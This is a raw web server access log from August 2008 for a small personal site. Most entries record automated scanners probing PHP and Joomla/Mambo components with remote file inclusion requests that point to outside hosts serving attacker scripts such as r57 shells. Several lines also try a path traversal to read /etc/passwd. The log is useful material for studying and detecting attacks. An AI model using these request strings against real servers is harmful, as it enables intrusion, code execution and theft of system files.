89.111.179.12 - - [28/Aug/2008:11:40:04 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85247 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:40:06 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:40:06 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:11:40:14 -0700] "GET /logs/access_080224.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.47.176 - - [28/Aug/2008:11:40:15 -0700] "GET /logs/access_080815.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.64.47.176 - - [28/Aug/2008:11:40:17 -0700] "GET /logs/access_080815.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.148.240 - - [28/Aug/2008:11:40:18 -0700] "GET /logs/access_080820.log/?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [28/Aug/2008:11:40:18 -0700] "GET /?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 200 85159 "-" "libwww-perl/5.811" "www.dmulk.com"
213.218.133.175 - - [28/Aug/2008:11:40:19 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.148.240 - - [28/Aug/2008:11:40:19 -0700] "GET /logs/?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 200 62571 "-" "libwww-perl/5.811" "www.dmulk.com"
91.191.167.34 - - [28/Aug/2008:11:40:21 -0700] "GET /logs/access_080815.log//index.php?option=com_custompages&cpage=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.106 - - [28/Aug/2008:11:40:21 -0700] "GET /logs/access_080815.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.141.48.47 - - [28/Aug/2008:11:40:23 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.9 - - [28/Aug/2008:11:40:24 -0700] "GET /logs/access_080815.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.176.106 - - [28/Aug/2008:11:40:25 -0700] "GET /logs/access_080815.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [28/Aug/2008:11:40:27 -0700] "GET /logs/access_080815.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.47.176 - - [28/Aug/2008:11:40:34 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85263 "-" "libwww-perl/5.803" "www.dmulk.com"
83.231.138.99 - - [28/Aug/2008:11:40:36 -0700] "GET /logs/access_080801.log//mainbody.php?option=com_wrapper&Itemid=1&mosConfig_absolute_path=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [28/Aug/2008:11:40:36 -0700] "GET //mainbody.php?option=com_wrapper&Itemid=1&mosConfig_absolute_path=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [28/Aug/2008:11:40:37 -0700] "GET /logs//mainbody.php?option=com_wrapper&Itemid=1&mosConfig_absolute_path=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:40:39 -0700] "GET /logs/access_080815.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.191.167.34 - - [28/Aug/2008:11:40:46 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.191.167.34 - - [28/Aug/2008:11:40:47 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 200 85279 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:40:55 -0700] "GET /logs/access_080815.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:40:55 -0700] "GET /logs/access_080815.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.104 - - [28/Aug/2008:11:40:57 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [28/Aug/2008:11:40:58 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85247 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [28/Aug/2008:11:41:01 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85247 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:41:08 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85263 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:41:08 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85247 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.4.31 - - [28/Aug/2008:11:41:12 -0700] "GET /logs/access_080327.log///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.177.4.31 - - [28/Aug/2008:11:41:12 -0700] "GET /logs/access_080405.log///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.177.4.31 - - [28/Aug/2008:11:41:13 -0700] "GET /logs///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.177.4.31 - - [28/Aug/2008:11:41:13 -0700] "GET ///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.248.62.98 - - [28/Aug/2008:11:41:15 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.147.239.184 - - [28/Aug/2008:11:41:17 -0700] "GET /logs/access_080107.log//index.php?option=com_joomlaxplorer&task=&Itemid=&mosConfig_absolute_path=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.147.239.184 - - [28/Aug/2008:11:41:18 -0700] "GET //index.php?option=com_joomlaxplorer&task=&Itemid=&mosConfig_absolute_path=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 200 85395 "-" "libwww-perl/5.810" "www.dmulk.com"
66.147.239.184 - - [28/Aug/2008:11:41:19 -0700] "GET /logs//index.php?option=com_joomlaxplorer&task=&Itemid=&mosConfig_absolute_path=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:42:01 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:42:02 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 200 85447 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:42:02 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:42:02 -0700] "GET /logs/access_080216.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:42:02 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:42:03 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 200 85447 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:42:03 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:42:03 -0700] "GET /logs/access_080216.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:11:42:08 -0700] "GET /bikes/dteel/2008_08_17/?N=A HTTP/1.0" 200 983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.147.239.184 - - [28/Aug/2008:11:42:40 -0700] "GET /logs/access_071220.log//index.php?option=com_joomlaxplorer&task=&Itemid=&mosConfig_absolute_path=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:42:50 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0018.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:43:04 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:43:04 -0700] "GET //config/dbutil.bck.php?confdir=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:43:04 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:43:09 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0061.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:43:11 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-124_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:43:32 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:43:32 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:43:37 -0700] "GET /logs/access_080722.log//atom.php5?page=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:43:39 -0700] "GET //atom.php5?page=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:43:40 -0700] "GET /logs//atom.php5?page=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:43:41 -0700] "GET //ashnews.php?pathtoashnews=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:43:43 -0700] "GET /logs//ashnews.php?pathtoashnews=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:43:50 -0700] "GET /logs/access_080509.log//dbase.php?action=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:43:51 -0700] "GET //dbase.php?action=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:43:52 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.73.146 - - [28/Aug/2008:11:43:52 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sujianto.com/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:11:43:52 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:11:43:52 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:11:43:53 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:44:06 -0700] "GET /logs/access_080717.log//dbase.php?action=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:44:14 -0700] "GET /logs/access_080508.log//ashnews.php?pathtoashnews=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:44:20 -0700] "GET /logs/access_080411.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.183.76 - - [28/Aug/2008:11:44:36 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:44:52 -0700] "GET /logs/access_080806.log//atom.php5?page=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:45:04 -0700] "GET /logs/access_080806.log//citywriter/head.php?path=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:45:05 -0700] "GET //citywriter/head.php?path=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:45:06 -0700] "GET /logs//citywriter/head.php?path=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:45:20 -0700] "GET /logs/access_071222.log//Neos_Chronos/header.php?base_folder=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:45:31 -0700] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:45:39 -0700] "GET /logs/access_080418.log//citywriter/head.php?path=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.57.153.114 - - [28/Aug/2008:11:45:43 -0700] "GET /logs/access_080125.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.57.153.114 - - [28/Aug/2008:11:45:43 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.57.153.114 - - [28/Aug/2008:11:45:44 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:46:27 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0038.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
66.187.101.26 - - [28/Aug/2008:11:46:33 -0700] "GET /logs/access_071222.log//components/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.187.101.26 - - [28/Aug/2008:11:46:33 -0700] "GET //components/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.187.101.26 - - [28/Aug/2008:11:46:33 -0700] "GET /logs/access_080226.log//components/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.187.101.26 - - [28/Aug/2008:11:46:33 -0700] "GET /logs//components/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:11:46:50 -0700] "GET /logs/access_080227.log//?path%5Bdocroot%5D=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:11:46:52 -0700] "GET //?path%5Bdocroot%5D=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 200 85167 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:11:46:53 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 200 62576 "-" "libwww-perl/5.79" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:47:00 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:47:00 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.147.239.184 - - [28/Aug/2008:11:47:09 -0700] "GET /logs/access_080510.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:11:47:09 -0700] "GET /logs/access_080717.log//?path%5Bdocroot%5D=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.147.239.184 - - [28/Aug/2008:11:47:10 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 200 85335 "-" "libwww-perl/5.810" "www.dmulk.com"
66.147.239.184 - - [28/Aug/2008:11:47:11 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.57.153.114 - - [28/Aug/2008:11:47:17 -0700] "GET /logs/access_080507.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:11:47:22 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:11:47:26 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:11:47:27 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 200 85455 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:11:47:37 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:47:43 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0004.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
69.64.47.176 - - [28/Aug/2008:11:48:10 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.47.176 - - [28/Aug/2008:11:48:11 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85247 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.47.176 - - [28/Aug/2008:11:48:17 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.47.176 - - [28/Aug/2008:11:48:18 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85231 "-" "libwww-perl/5.803" "www.dmulk.com"
66.147.239.184 - - [28/Aug/2008:11:48:27 -0700] "GET /logs/access_080501.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:48:31 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-043_3.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:48:44 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:48:44 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:48:45 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:48:45 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:49:07 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
